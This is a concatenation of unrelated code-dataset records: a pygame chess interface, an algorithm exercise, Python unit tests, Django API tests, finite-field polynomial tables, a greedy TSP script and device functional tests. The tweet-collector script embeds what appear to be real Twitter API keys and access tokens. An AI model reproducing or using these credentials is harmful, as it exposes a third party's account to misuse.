playerClicks[1], gs.board)\n\n print(move.getChessNotations())\n print(move.moveID)\n for i in range(len(validMoves)):\n if move == validMoves[i]:\n if validMoves[i].isPawnPromotion:\n print(\"Enter choice\\nRook : R\\nBishop : B\\nKnight : N\\nQueen : Any else key\")\n pieceInput = True\n while pieceInput:\n promoteEvent = p.event.wait()\n if promoteEvent.type == p.QUIT:\n pieceInput = False\n elif promoteEvent.type == p.KEYDOWN:\n pieceInput = False\n if promoteEvent.key == p.K_r:\n print(\"you chose Rook\")\n validMoves[i].promoteTo = 'R'\n elif promoteEvent.key == p.K_b:\n print(\"you chose Bishop\")\n validMoves[i].promoteTo = 'B'\n elif promoteEvent.key == p.K_n:\n print(\"you chose Knight\")\n validMoves[i].promoteTo = 'N'\n else:\n print(\"you chose Queen\")\n validMoves[i].promoteTo = 'Q'\n else:\n pass\n gs.makeMove(validMoves[i])\n moveMade = True\n animate = True\n sqSelected = () # reset user clicks\n playerClicks = []\n if not moveMade:\n playerClicks = [sqSelected]\n elif e.type == p.KEYDOWN:\n if e.key == p.K_z:\n if not gameOver:\n gs.undoMove()\n gs.getValidMoves()\n moveMade = True\n animate = False\n gameOver = False\n elif e.key == p.K_0:\n light = \"light gray\"\n dark = \"dark gray\"\n elif e.key == p.K_1:\n light = \"#E9D298\"\n dark = \"#9B7655\"\n elif e.key == p.K_2:\n light = \"#77B5FE\"\n dark = \"blue\"\n elif e.key == p.K_3:\n light = \"pink\"\n dark = \"brown\"\n elif e.key == p.K_r: # reset board\n gs = 
ChessEngine.GameState()\n validMoves = gs.getValidMoves()\n sqSelected = ()\n playerClicks = []\n playerOne = False # if white is human this is True\n playerTwo = False # if black is human this is True\n moveMade = False\n animate = False\n gameOver = False\n if not humanTurn and not gameOver:\n move = SmartMoves.findBestMoveMinMax(gs, validMoves)\n # move = None\n if move is None:\n move = SmartMoves.randomAI(validMoves)\n gs.makeMove(move)\n moveMade = True\n animate = True\n if moveMade:\n if animate:\n animateMove(screen, gs.moveLog[-1], gs.board, clock)\n validMoves = gs.getValidMoves()\n if len(validMoves) == 0 and gs.inCheck:\n gs.checkMate = True\n gameOver = True\n elif len(validMoves) == 0 and not gs.inCheck:\n gs.staleMate = True\n gameOver = True\n print(\"white to move\" if gs.whiteToMove else \"black to move\")\n moveMade = False\n animate = False\n\n drawGameSate(screen, gs, validMoves, sqSelected, light, dark)\n\n if gs.checkMate:\n gameOver = True\n print(gs.whiteKingLocation)\n print(gs.blackKingLocation)\n if gs.whiteToMove:\n drawText(screen, \"Black wins by checkmate\")\n else:\n drawText(screen, \"White wins by checkmate\")\n elif gs.staleMate:\n gameOver = True\n drawText(screen, \"Draw by stalemate\")\n clock.tick(MAX_FPS)\n p.display.flip()\n\n\n'''\nHighlighting selected piece and possible moves of it\n'''\n\n\ndef highlightSquares(screen, gs, validMoves, sqSelected):\n lastStart = p.Surface((SQ_SIZE, SQ_SIZE))\n lastEnd = p.Surface((SQ_SIZE, SQ_SIZE))\n\n lastStart.set_alpha(100)\n lastEnd.set_alpha(100)\n\n lastStart.fill(p.Color('green'))\n lastEnd.fill(p.Color('light green'))\n captureAble = []\n if sqSelected != ():\n r, c = sqSelected\n if gs.board[r][c][0] == (\"w\" if gs.whiteToMove else \"b\"): # selected square can be moved\n # highlight selected square\n select = p.Surface((SQ_SIZE, SQ_SIZE))\n capture = p.Surface((SQ_SIZE, SQ_SIZE))\n possible = p.Surface((SQ_SIZE, SQ_SIZE))\n\n select.set_alpha(100) # transparency value\n capture.set_alpha(100)\n possible.set_alpha(100)\n\n select.fill(p.Color('#6699cc')) # fill color\n capture.fill(p.Color('red'))\n possible.fill(p.Color('yellow'))\n\n # highlight selected square\n screen.blit(select, (c * SQ_SIZE, r * SQ_SIZE))\n\n\n # highlight possible moves\n for move in validMoves:\n if (move.startRow == r and move.startCol == c) and (move.isEnpassantMove or move.pieceCaptured != \"--\"):\n screen.blit(capture, (move.endCol * SQ_SIZE, move.endRow * SQ_SIZE))\n captureAble.append((move.endRow, move.endCol))\n elif move.startRow == r and move.startCol == c:\n screen.blit(possible, (move.endCol * SQ_SIZE, move.endRow * SQ_SIZE))\n\n # highlight last move\n if len(gs.moveLog) != 0:\n lastStartRow, lastStartCol = gs.moveLog[-1].startRow, gs.moveLog[-1].startCol\n lastEndRow, lastEndCol = gs.moveLog[-1].endRow, gs.moveLog[-1].endCol\n screen.blit(lastStart, (lastStartCol * SQ_SIZE, lastStartRow * SQ_SIZE))\n if (lastEndRow, lastEndCol) not in captureAble:\n screen.blit(lastEnd, (lastEndCol * SQ_SIZE, lastEndRow * SQ_SIZE))\n\n\n'''\nresponsible for all the graphics within a current game state\n'''\n\n\ndef drawGameSate(screen, gs, validMoves, sqSelected, light, dark):\n drawBoard(screen, light, dark) # draw squares on board\n highlightSquares(screen, gs, validMoves, sqSelected)\n drawPieces(screen, gs.board) # draw pieces on top of those squares\n\n\n'''\nDraw the squares on the board\n'''\n\n\ndef drawBoard(screen, light, dark):\n colors = [p.Color(light), p.Color(dark)]\n for r in range(DIMENSION):\n for c in 
range(DIMENSION):\n color = colors[((r + c) % 2)]\n p.draw.rect(screen, color, p.Rect(c * SQ_SIZE, r * SQ_SIZE, SQ_SIZE, SQ_SIZE))\n\n\n'''\nDraw the pieces on the board using the current GameState.board\n'''\n\n\ndef drawPieces(screen, board):\n for r in range(DIMENSION):\n for c in range(DIMENSION):\n piece = board[r][c]\n if piece != \"--\":\n screen.blit(IMAGES[piece], p.Rect(c * SQ_SIZE, r * SQ_SIZE, SQ_SIZE, SQ_SIZE))\n\n\ndef animateMove(screen, move, board, clock):\n coordinates = [] # list of co-ordinates the animation will move through\n dR = move.endRow - move.startRow\n dC = move.endCol - move.startCol\n framesPerSquare = 1 # frames to move one square\n frameCount = (abs(dR) + abs(dC)) * framesPerSquare\n for frame in range(frameCount + 1):\n r, c = (move.startRow + dR * frame / frameCount, move.startCol + dC * frame / frameCount)\n drawBoard(screen, 'light gray', 'dark gray')\n drawPieces(screen, board)\n # erase piece moved from its ending square\n color = COLORS[(move.endRow + move.endCol) % 2]\n endSquare = p.Rect(move.endCol * SQ_SIZE, move.endRow * SQ_SIZE, SQ_SIZE, SQ_SIZE)\n p.draw.rect(screen, color, endSquare)\n if move.pieceCaptured != \"--\":\n if move.isEnpassantMove:\n enpassantRow = (move.endRow + 1) if move.pieceMoved[0] == 'w' else (move.endRow - 1)\n endSquare = p.Rect(move.endCol * SQ_SIZE, enpassantRow * SQ_SIZE, SQ_SIZE, SQ_SIZE)\n screen.blit(IMAGES[move.pieceCaptured], endSquare)\n # draw moving piece\n if not move.isEnpassantMove and move.pieceMoved != \"--\":\n screen.blit(IMAGES[move.pieceMoved], p.Rect(c * SQ_SIZE, r * SQ_SIZE, SQ_SIZE, SQ_SIZE))\n p.display.flip()\n clock.tick(60)\n\n\ndef drawText(screen, text):\n font = p.font.SysFont(\"Open Sans\", 32, True, False)\n textShadow = font.render(text, 0, p.Color('Dark Gray'))\n textLocation = p.Rect(0, 0, WIDTH, HEIGHT).move(WIDTH / 2 - textShadow.get_width() / 2,\n HEIGHT / 2 - textShadow.get_height() / 2)\n screen.blit(textShadow, textLocation)\n textObject = font.render(text, 0, p.Color('Black'))\n screen.blit(textObject, textLocation.move(-2, -2))\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"MyChess/ChessMain.py","file_name":"ChessMain.py","file_ext":"py","file_size_in_byte":12068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"198397035","text":"# Level 2 practice: Find the largest square\n# https://programmers.co.kr/learn/courses/30/lessons/12905\n\nfrom collections import deque\n\ndef solution(maps):\n x_move = [1, 0, -1, 0]\n y_move = [0, 1, 0, -1]\n x_h, y_h = (len(maps[0]), len(maps))\n queue = deque([(0, 0, 1)])\n while queue:\n x, y, d = queue.popleft()\n for i in range(4):\n nx = x + x_move[i]\n ny = y + y_move[i]\n if nx > -1 and ny > -1 and nx < x_h and ny < y_h:\n if maps[ny][nx] == 1 or maps[ny][nx] > d + 1:\n maps[ny][nx] = d + 1\n if nx == x_h - 1 and ny == y_h - 1:\n return d + 1\n queue.append((nx, ny, d + 1))\n return -1\n\n\nprint(solution([[1,0,1,1,1],[1,0,1,0,1],[1,0,1,1,1],[1,1,1,0,1],[0,0,0,0,1]])) # 11\nprint(solution([[1,0,1,1,1],[1,0,1,0,1],[1,0,1,1,1],[1,1,1,0,0],[0,0,0,0,1]])) # -1\n\n","sub_path":"programmers/level2/1844_게임맵최단거리.py","file_name":"1844_게임맵최단거리.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"640145803","text":"import unittest\nfrom yaml import safe_load\n\nfrom relaty.relat import Relat\nfrom relaty.story import Story\n\n\nclass TestRelaty(unittest.TestCase):\n\n def setUp(self):\n super().setUp()\n\n document = 
\"\"\"\n title: A title\n screens:\n - Hello, how are you?\n - These are two screens\n options:\n - title: option 1\n screens:\n - option 1 screen 1\n - option 1 screen 2\n options:\n - title: option 1.1\n screens:\n - option 1.1 screen 1\n - option 1.1 screen 2\n - FIN\n - title: option 1.2\n screens:\n - option 1.2 screen 1\n - option 1.2 screen 2\n options:\n - title: option 1.2.1\n screens:\n - option 1.2.1 screen 1\n - option 1.2.1 screen 2\n - FIN\n - title: option 1.2.2\n screens:\n - option 1.2.2 screen 1\n - option 1.2.2 screen 2\n - FIN\n - title: Option 2\n screens:\n - option 2 screen 1\n - option 2 screen 2\n - FIN\n \"\"\"\n\n converted_document = safe_load(document)\n self.relat_from_document = Relat.create_from_document(\n converted_document)\n self.story_from_document = self.relat_from_document.story\n\n relat_title = \"A test Relat\"\n self.empty_relat = Relat(title=relat_title)\n\n def test_story_should_have_a_title(self):\n document = \"\"\"\n otro:otro\n \"\"\"\n self.assertRaises(TypeError, Relat.create_from_document, document)\n\n def test_screens_are_created_correctly(self):\n\n # Screens are created correctly\n self.assertEqual(len(self.story_from_document.screens), 2)\n\n def test_options_are_created_correctly(self):\n self.assertEqual(len(self.story_from_document.options), 2)\n\n def test_cant_create_relat_with_invalidid_options(self):\n failed_document = \"\"\"\n no: tienen\n sentido: estos\n cosos: no?\n \"\"\"\n\n self.assertRaises(\n TypeError, Relat.create_from_document, failed_document)\n\n def test_relat_has_correct_number_of_endings(self):\n expected_endings = 4\n actual_endings = self.relat_from_document.get_number_endings\n\n self.assertEqual(expected_endings, actual_endings)\n\n def test_can_create_empty_relat(self):\n self.assertEqual(self.empty_relat.title, \"A test Relat\")\n\n def test_a_screens_can_be_added_to_story(self):\n screens = [\n \"Screen 1\",\n \"Screen 2\"\n ]\n\n for screen in screens:\n self.empty_relat.add_screen(screen)\n\n self.assertEqual(len(self.empty_relat.screens), 2)\n\n for actual, expected in zip(screens, self.empty_relat.screens):\n self.assertEqual(actual, expected)\n\n def test_an_option_can_be_added_to_relat(self):\n self.empty_relat.add_screen(\"A screen\")\n\n self.empty_relat.add_option(\n Story(\n title=\"Option 1\"\n )\n )\n\n # Test the option was added\n self.assertEqual(\n len(self.empty_relat.options),\n 1\n )\n\n # Test the added option has the given title\n self.assertEqual(\n self.empty_relat.options[0].title,\n \"Option 1\"\n )\n\n def test_add_screen_to_story(self):\n\n empty_story = Story(title=\"A story\", screens=[])\n\n screen = \"A screen\"\n\n empty_story.add_screen(screen)\n\n # Test screen was added\n self.assertEqual(\n len(empty_story.screens),\n 1\n )\n\n # Test added screen is given screen\n self.assertEqual(\n empty_story.screens[0],\n screen\n )\n\n def test_an_option_can_be_added_to_story(self):\n empty_story = Story(title=\"A story\", screens=[])\n\n screen = \"A screen\"\n\n empty_story.add_screen(screen)\n\n option = Story(title=\"Option 1\", screens=[\"An option screen\"])\n\n empty_story.add_option(option)\n\n # Test screen was added\n self.assertEqual(\n len(empty_story.options),\n 1\n )\n\n # Test added screen is given screen\n self.assertEqual(\n empty_story.options[0].title,\n \"Option 1\"\n )\n\n def test_an_option_can_be_retrieved_navigating_story(self):\n\n option1 = self.story_from_document.get_option(0)\n\n self.assertEqual(\n option1.title,\n \"option 1\"\n )\n\n option2 = 
self.story_from_document.get_option(1)\n\n self.assertEqual(\n option2.title,\n \"Option 2\"\n )\n\n option121 = self.story_from_document\\\n .get_option(0).get_option(1).get_option(0)\n\n self.assertEqual(\n option121.title,\n \"option 1.2.1\"\n )\n\n def test_shallow_equals_returns_true_if_title_and_screens_are_equal(self):\n o1 = Story(title=\"Option 1\", screens=[\"O1 screen\"])\n\n s1 = Story(\n title=\"Story 1\",\n screens=[\"Screen 1\"],\n )\n s1.options = [o1]\n\n s2 = Story(\n title=\"Story 1\",\n screens=[\"Screen 1\"],\n options=[]\n )\n\n s3 = Story(\n title=\"Story 1\",\n screens=[\"Screen\"],\n options=[]\n )\n\n self.assertTrue(\n s1.shallow_equal(s2)\n )\n\n self.assertFalse(\n s1.shallow_equal(s3)\n )\n\n def test_equals_returns_true_if_storys_are_similar_and_shallow_equal(self):\n o1 = Story(title=\"Option 1\", screens=[\"O1 screen\"])\n\n s1 = Story(\n title=\"Story 1\",\n screens=[\"Screen 1\"],\n )\n s1.options = [o1]\n\n s2 = Story(\n title=\"Story 1\",\n screens=[\"Screen 1\"],\n )\n s2.options = [o1]\n\n s3 = Story(\n title=\"Story 1\",\n screens=[\"Screen\"],\n options=[]\n )\n\n s4 = Story(\n title=\"Story 1\",\n screens=[\"Screen 1\"],\n )\n\n self.assertNotEqual(\n s1, 1\n )\n\n self.assertNotEqual(\n s1, s3\n )\n\n self.assertNotEqual(\n s1, s4\n )\n\n self.assertEqual(\n s1, s2\n )\n\n def test_navigating_with_valid_paths_works(self):\n path1 = [0, 0]\n\n self.assertEqual(self.relat_from_document.navigate(\n path1).screens[0], \"option 1.1 screen 1\")\n","sub_path":"test/test_relaty.py","file_name":"test_relaty.py","file_ext":"py","file_size_in_byte":6797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"162360696","text":"from django.core.urlresolvers import reverse\nfrom rest_framework import status\nfrom rest_framework.test import APITestCase\n\nfrom .models import Produto\n\n\nclass TestProdutoList(APITestCase):\n def test_create_produto(self):\n url = reverse('produtos:produto-list')\n data = {'nome':'teste', 'preco':13.5}\n response = self.client.post(url, data, format='json')\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n self.assertEqual(Produto.objects.count(), 1)\n self.assertEqual(Produto.objects.get().nome, 'teste')\n\n def test_get_produto(self):\n url = reverse('produtos:produto-list')\n response = self.client.get(url)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n\n\nclass TestProdutoDetails(APITestCase):\n def setUp(self):\n Produto.objects.create(nome='teste')\n\n def test_get_produto(self):\n url = reverse('produtos:produto-details', kwargs={'pk':Produto.objects.get().id})\n response = self.client.get(url, data=None, format='json')\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n\n def test_update_produto(self):\n produto = Produto.objects.get()\n url = reverse('produtos:produto-details', kwargs={'pk':produto.id})\n data = {'nome':'teste2', 'preco':13}\n response = self.client.put(url, data, format='json')\n self.assertEqual(Produto.objects.get().nome, 'teste2')\n self.assertEqual(Produto.objects.get().preco, 13)\n\n def test_delete_produto(self):\n url = reverse('produtos:produto-details', kwargs={'pk':Produto.objects.get().id})\n response = self.client.delete(url, format='json')\n self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)\n","sub_path":"produtos/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} 
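The `produtos` test record above resolves every endpoint through `reverse('produtos:produto-list')` and `reverse('produtos:produto-details', kwargs={'pk': ...})`, so a namespaced URLconf with exactly those route names must exist in the project even though it is not part of the record. A sketch of a URLconf consistent with those calls, using the pre-2.0 `django.conf.urls` API to match the tests' `django.core.urlresolvers` import (the view classes are assumptions; only the route names and the `pk` kwarg are pinned down by the tests):

```python
# Hypothetical produtos/urls.py implied by the reverse() names in the tests.
from django.conf.urls import url

from . import views  # assumed module exposing two DRF class-based views

app_name = 'produtos'  # supplies the 'produtos:' namespace used in reverse()

urlpatterns = [
    url(r'^$', views.ProdutoList.as_view(), name='produto-list'),
    url(r'^(?P<pk>[0-9]+)/$', views.ProdutoDetails.as_view(), name='produto-details'),
]
```

One sharpening worth noting: `test_update_produto` asserts only on the database state after the PUT; also asserting `response.status_code == status.HTTP_200_OK` there would catch a request that the view silently rejects.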
+{"seq_id":"322819580","text":"\"\"\"\nA module containing LUTs for primitive polynomials over GF(2^2).\n\nSage:\n def integer(coeffs, order):\n i = 0\n for d, c in enumerate(coeffs[::-1]):\n i += (c.integer_representation() * order**d)\n return i\n\n order = 2**2\n degree = 1\n list_ = []\n R = GF(order, repr=\"int\")[\"x\"]\n for f in R.polynomials(degree):\n # For some reason `is_primitive()` crashes on f(x) = x\n if f.coefficients(sparse=False) == [0, 1]:\n continue\n if f.is_monic() and f.is_primitive():\n list_.append(f.coefficients(sparse=False)[::-1])\n\n # Sort in lexicographical order\n if not is_prime(order):\n list_ = sorted(list_, key=lambda item: integer(item, order))\n\n print(f\"PRIMITIVE_POLYS_{order}_{degree} = {list_}\")\n\"\"\"\n\n# LUT items are poly coefficients in degree-descending order\n\nPRIMITIVE_POLYS_4_1 = [\n [1, 2],\n [1, 3],\n]\n\nPRIMITIVE_POLYS_4_2 = [\n [1, 1, 2],\n [1, 1, 3],\n [1, 2, 2],\n [1, 3, 3],\n]\n\nPRIMITIVE_POLYS_4_3 = [\n [1, 1, 1, 2],\n [1, 1, 1, 3],\n [1, 1, 2, 3],\n [1, 1, 3, 2],\n [1, 2, 1, 3],\n [1, 2, 2, 2],\n [1, 2, 3, 2],\n [1, 2, 3, 3],\n [1, 3, 1, 2],\n [1, 3, 2, 2],\n [1, 3, 2, 3],\n [1, 3, 3, 3],\n]\n","sub_path":"tests/polys/luts/primitive_polys_4.py","file_name":"primitive_polys_4.py","file_ext":"py","file_size_in_byte":1241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"55012258","text":"\"\"\"\nReads Adj Matrix from file\nExpects this kind of syntax\nFirst Line:N=Number of vertex\nNext N lines: Row of numbers separated with \",\"\nLast 2 lines: Start vertex,End vertex\n\nIN:Filname-String\nRETURNS:ADJ MATRIX,START CITY,END CITY\n\"\"\"\ndef readFromFile(fileName):\n f=open(fileName)\n matrix=[]\n a=int(f.readline())\n for x in range(a):\n x=f.readline()\n z=x.split(\",\")\n list=[]\n for s in z:\n list.append(int(s))\n matrix.append(list)\n startCity=int(f.readline())-1\n destCity=int(f.readline())-1\n return matrix,startCity,destCity\n\n\"\"\"\nFind the shortest path form one vertex to another\n\nIN:Adj Matrix,start,end-optional\n(If parameter end is not set it will go through all the vertexes)\nOUT:Cost of the path,and the visited\n\"\"\"\nMAX_VAL=9999999999\ndef TCP(matrix,start, end=None):\n actualNode = start\n visited = [actualNode]\n cost = 0\n while end not in visited and len(visited) < len(matrix):\n lst = [el for el in matrix[actualNode]]\n while lst.index(min(lst)) in visited:\n lst[lst.index(min(lst))] = MAX_VAL\n for x in lst:\n if(x==0):\n lst[lst.index(x)]=MAX_VAL\n cost += min(lst)\n actualNode = lst.index(min(lst))\n visited.append(lst.index(min(lst)))\n if end is None:\n cost += matrix[visited[-1]][start]\n return (cost,visited)\n\n\nif __name__==\"__main__\":\n matrix,start,stop=readFromFile(\"easy_01_tsp.txt\")\n print(TCP(matrix,start))","sub_path":"TCP.py","file_name":"TCP.py","file_ext":"py","file_size_in_byte":1616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"495654054","text":"from tweepy import Stream\nfrom tweepy import OAuthHandler\nfrom tweepy.streaming import StreamListener\nimport json\nimport tweepy\nimport random\n# consumer key, consumer secret, access token, access secret.\nckey = \"p3W58bKWtFTj2XvYoH6UFtSCh\"\ncsecret = \"aFzMrIbXFmi5vfGz0bR4tXlJ1C7r8KGsI134eEDEVez5EZlB98\"\natoken = \"3238419461-XhoFQm3LWcSSqpVv99f8KoyZm03d4vvOztglL4r\"\nasecret = \"x5yu3Qf55dcz1Uzmc5HEXIfGhYiMcesQM9OyTS9T3p6V6\"\ncount=0\nf=open(\"tweet_data.json\", 'w+')\nf.write('[')\nclass 
listener(StreamListener):\n def on_data(self, data):\n all_data = json.loads(data)\n tweet = all_data[\"text\"]\n d={}\n '''\n {\"lang\": \"en\", \"created_at\": \"Wed Jun 22 12:54:44 +0000 2016\",\n \"popularity\": 124, \"screen_name\": \"jodhaanirudh\", \"name\": \"anirudhjodha\", \"follower_count\": 24,\n \"Friends\": 99, \"Location\": null, \"id\": 745600913272872960, \"text\": \"RT @digvijaya_28: A complete U Turn by Modi Sarkar.\n Every time UPA Govt opened up the Economy there was a barrage of criticism from Modi BJ\\u2026\"}\n '''\n d['text']=tweet\n\n d['created_at']=all_data['created_at']\n d['screen_name']=all_data['user']['screen_name']\n d['id']=all_data['id']\n d['popularity']=all_data['user']['favourites_count']\n d['Friends']=all_data['user']['friends_count']\n d['lang']=all_data['lang']\n d['follower_count']=all_data['user']['followers_count']\n d['Location'] = all_data['user']['location']\n d['name']=all_data['user']['name']\n d['time zone']=all_data['user']['time_zone']\n d['sentiment'] = random.randint(0, 500)\n #d['urls']=all_data['urls']\n json.dump(d, f)\n f.write(',')\n return (True)\n\n\n def on_error(self, status):\n print(status)\n\n\ndef collect(entity):\n auth = OAuthHandler(ckey, csecret)\n auth.set_access_token(atoken, asecret)\n api = tweepy.API(auth)\n user=api.me()\n print(user.name)\n print(user.location)\n twitterStream = Stream(auth, listener())\n twitterStream.filter(track=[entity])\n return 0\nif __name__ == '__main__':\n collect('modi')\n\n\n\n\n\n\n\n","sub_path":"UI/home/tweet_collector.py","file_name":"tweet_collector.py","file_ext":"py","file_size_in_byte":2133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"140936194","text":"# Copyright 2021 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Test suite for all primary devices. 
Covers basic functionality.\"\"\"\nimport datetime\nimport os\nimport shutil\nimport time\nfrom typing import Tuple, Type\n\nimport gazoo_device\nfrom gazoo_device import errors\nfrom gazoo_device import fire_manager\nfrom gazoo_device.base_classes import gazoo_device_base\nfrom gazoo_device.tests.functional_tests.utils import gdm_test_base\nimport retry\n\n# Allows the log process to catch up after device creation using time.sleep().\n# Prevents _verify_no_unexpected_bootups() from checking old bootup log events.\n_LOG_CATCH_UP_DELAY = 3\n\n\nclass CommonTestSuite(gdm_test_base.GDMTestBase):\n \"\"\"Common test suite for all primary devices.\"\"\"\n\n @classmethod\n def is_applicable_to(cls, device_type: str,\n device_class: Type[gdm_test_base.DeviceType],\n device_name: str) -> bool:\n \"\"\"Determine if this test suite can run on the given device.\"\"\"\n return issubclass(device_class, gazoo_device_base.GazooDeviceBase)\n\n @classmethod\n def requires_pairing(cls) -> bool:\n \"\"\"Returns True if the device must be paired to run this test suite.\"\"\"\n return False\n\n @classmethod\n def required_test_config_variables(cls) -> Tuple[str, ...]:\n \"\"\"Returns keys required to be present in the functional test config.\"\"\"\n return (\"shell_cmd\", \"expect\", \"known_logline\")\n\n @retry.retry(tries=2, delay=30)\n def test_01_factory_reset(self):\n \"\"\"Tests factory resetting the device and verifies it's online after.\n\n The test name includes \"01\" to make sure this test appears (and therefore\n runs) before other tests in alphabetic order.\n \"\"\"\n time.sleep(_LOG_CATCH_UP_DELAY)\n start_time = datetime.datetime.now()\n\n self.device.factory_reset()\n self.assertTrue(\n self.device.connected,\n f\"{self.device.name} is offline after factory_reset() execution \"\n \"finished. factory_reset should block until the device comes back \"\n \"online and becomes responsive.\")\n self._verify_no_unexpected_reboots(start_time)\n\n def test_close_device(self):\n \"\"\"Tests that device.close() stops logging.\"\"\"\n log_file = self.device.log_file_name\n self.assertTrue(\n os.path.exists(log_file), \"Cannot test close as device is not logging\")\n self.device.close()\n time.sleep(1)\n size = os.stat(log_file).st_size\n time.sleep(.1)\n self.assertEqual(size,\n os.stat(log_file).st_size,\n \"Log has updated after device is closed\")\n\n def test_logging(self):\n \"\"\"Tests that device logs are being captured.\"\"\"\n self._verify_logging()\n\n def test_serial_number(self):\n \"\"\"Tests retrieval of 'serial_number' property.\"\"\"\n serial_number = self.device.serial_number\n self.assertTrue(serial_number)\n self.assertIsInstance(serial_number, str)\n\n def test_firmware_version(self):\n \"\"\"Tests retrieval of 'firmware_version' property.\"\"\"\n self._verify_firmware_version()\n\n @retry.retry(tries=2, delay=30)\n def test_reboot_and_expect_known_logline(self):\n \"\"\"Tests rebooting and waiting for a certain log line.\n\n After the reboot verifies that the device is connected, logging, able to\n retrieve the firmware version, passes health checks, that the device\n actually rebooted, and that no unexpected bootups happened. Also waits for\n the known log line after rebooting.\n \"\"\"\n time.sleep(_LOG_CATCH_UP_DELAY)\n start_time = datetime.datetime.now()\n\n self.device.reboot()\n self.assertTrue(\n self.device.connected,\n f\"{self.device.name} is offline after reboot() execution finished. 
\"\n \"reboot should block until the device comes back online and becomes \"\n \"responsive.\")\n self._verify_logging()\n self._verify_firmware_version()\n self._verify_expect_log()\n\n # Wait to ensure last bootup event has been logged by the logger process.\n time.sleep(_LOG_CATCH_UP_DELAY)\n self._verify_boot_up_log(start_time)\n self._verify_no_unexpected_reboots(start_time)\n\n try:\n self.device.check_device_ready()\n except errors.CheckDeviceReadyError as err:\n self.fail(\n f\"{self.device.name} didn't pass health checks after reboot: {err!r}\")\n\n def test_shell(self):\n \"\"\"Tests shell() method.\"\"\"\n response = self.device.shell(self.test_config[\"shell_cmd\"])\n self.assertTrue(response)\n self.assertIsInstance(response, str)\n\n def test_start_new_log(self):\n \"\"\"Tests that start_new_log begins a new log file.\"\"\"\n old_log_file_name = self.device.log_file_name\n self.device.start_new_log(log_name_prefix=self.get_log_suffix())\n self.assertNotEqual(\n old_log_file_name, self.device.log_file_name,\n f\"Expected log file name to change from {old_log_file_name}\")\n self.assertTrue(\n os.path.exists(old_log_file_name),\n f\"Expected old log file name {old_log_file_name} to exist\")\n self.assertTrue(\n os.path.exists(self.device.log_file_name),\n f\"Expected new log file name {self.device.log_file_name} to exist\")\n\n def test_get_prop(self):\n \"\"\"Tests that FireManager.get_prop() can retrieve all properties.\"\"\"\n device_name = self.device.name\n self.device.close()\n fire_manager_instance = fire_manager.FireManager()\n try:\n fire_manager_instance.get_prop(device_name)\n finally:\n fire_manager_instance.close()\n\n @retry.retry(tries=2, delay=30)\n def test_redetect(self):\n \"\"\"Tests device detection and properties populated during detection.\"\"\"\n self.device.close()\n time.sleep(.2)\n new_file_devices_name = os.path.join(self.get_output_dir(),\n \"test_redetect_devices.json\")\n new_file_options_name = os.path.join(self.get_output_dir(),\n \"test_redetect_device_options.json\")\n new_log_file = os.path.join(self.get_output_dir(), \"test_redetect_gdm.txt\")\n\n shutil.copy(self.get_manager().device_file_name, new_file_devices_name)\n shutil.copy(self.get_manager().device_options_file_name,\n new_file_options_name)\n new_manager = gazoo_device.Manager(\n device_file_name=new_file_devices_name,\n device_options_file_name=new_file_options_name,\n log_directory=self.get_output_dir(),\n gdm_log_file=new_log_file)\n try:\n new_manager.redetect(self.device.name, self.get_output_dir())\n finally:\n new_manager.close()\n\n # pylint: disable=protected-access\n self.assertTrue(\n self.device.name in new_manager._devices,\n \"Device was not successfully detected. 
See test_redetect_gdm.txt and \"\n f\"{self.device.device_type}_detect.txt for more info\")\n old_dict = self.get_manager()._devices[self.device.name][\"persistent\"]\n new_dict = new_manager._devices[self.device.name][\"persistent\"]\n # pylint: enable=protected-access\n\n for name, a_dict in [(\"Old\", old_dict), (\"Detected\", new_dict)]:\n self.logger.info(\"%s configuration:\", name)\n for key, value in a_dict.items():\n self.logger.info(\"\\t%s: %s\", key, value)\n\n missing_props = []\n bad_values = []\n for prop, old_value in old_dict.items():\n if prop in new_dict:\n new_value = new_dict[prop]\n if old_value != new_value:\n bad_values.append(\"{}: {!r} was previously {!r}\".format(\n prop, new_value, old_value))\n else:\n missing_props.append(prop)\n msg = \"\"\n if missing_props:\n msg += \"{} is missing the following previous props: {}.\\n\".format(\n self.device.name, missing_props)\n if bad_values:\n msg += \"{} has the following mismatched values: {}.\".format(\n self.device.name, \", \".join(bad_values))\n\n self.assertFalse(missing_props or bad_values, msg)\n\n def _verify_firmware_version(self):\n \"\"\"Verifies that firmware version is a non-empty string.\"\"\"\n firmware_version = self.device.firmware_version\n self.assertTrue(firmware_version)\n self.assertIsInstance(firmware_version, str)\n\n def _verify_logging(self):\n \"\"\"Verifies that the device has a non-empty log file.\"\"\"\n log_file = self.device.log_file_name\n self.assertTrue(os.path.exists(log_file),\n f\"{self.device.name}'s log file {log_file} does not exist\")\n self.assertTrue(os.path.getsize(log_file),\n f\"{self.device.name}'s log file {log_file} is empty\")\n\n def _verify_boot_up_log(self, start_time):\n \"\"\"Verifies that the device booted up once after the start_time.\"\"\"\n parser_result = self.device.event_parser.get_last_event([\"basic.bootup\"])\n self.assertGreater(parser_result.count, 0,\n \"Error: event label 'basic.bootup' not found.\")\n timestamp = parser_result.results_list[0][\"system_timestamp\"]\n self.assertGreater(\n timestamp, start_time,\n \"Expected basic 